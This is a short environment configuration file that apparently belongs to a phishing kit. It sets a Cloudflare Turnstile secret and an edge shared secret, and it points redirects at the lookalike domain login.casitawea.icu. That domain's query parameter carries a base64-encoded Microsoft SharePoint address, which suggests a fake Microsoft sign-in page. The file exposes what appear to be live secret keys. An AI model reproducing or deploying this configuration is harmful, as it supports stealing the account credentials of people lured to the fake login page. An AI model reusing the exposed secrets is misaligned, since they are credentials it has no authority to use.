CF_TURNSTILE_SECRET=0x4AAAAAABhsKB08FLtdncJT3mXgzkRm0yI
REDIRECT_BASE=https://login.casitawea.icu/?oleOXZQmi1LY=aHR0cHM6Ly9taWNyb3NvZnQuc2hhcmVwb2ludC5jb20vOng6L3IvdGVhbXMvKipURUFN
ALLOWED_REDIRECT_HOSTS=login.casitawea.icu
EDGE_SHARED_SECRET=y0yJ5mY5lMLzH6f0aH0mX9x2hY5k8X2o0Yg0dzvZR
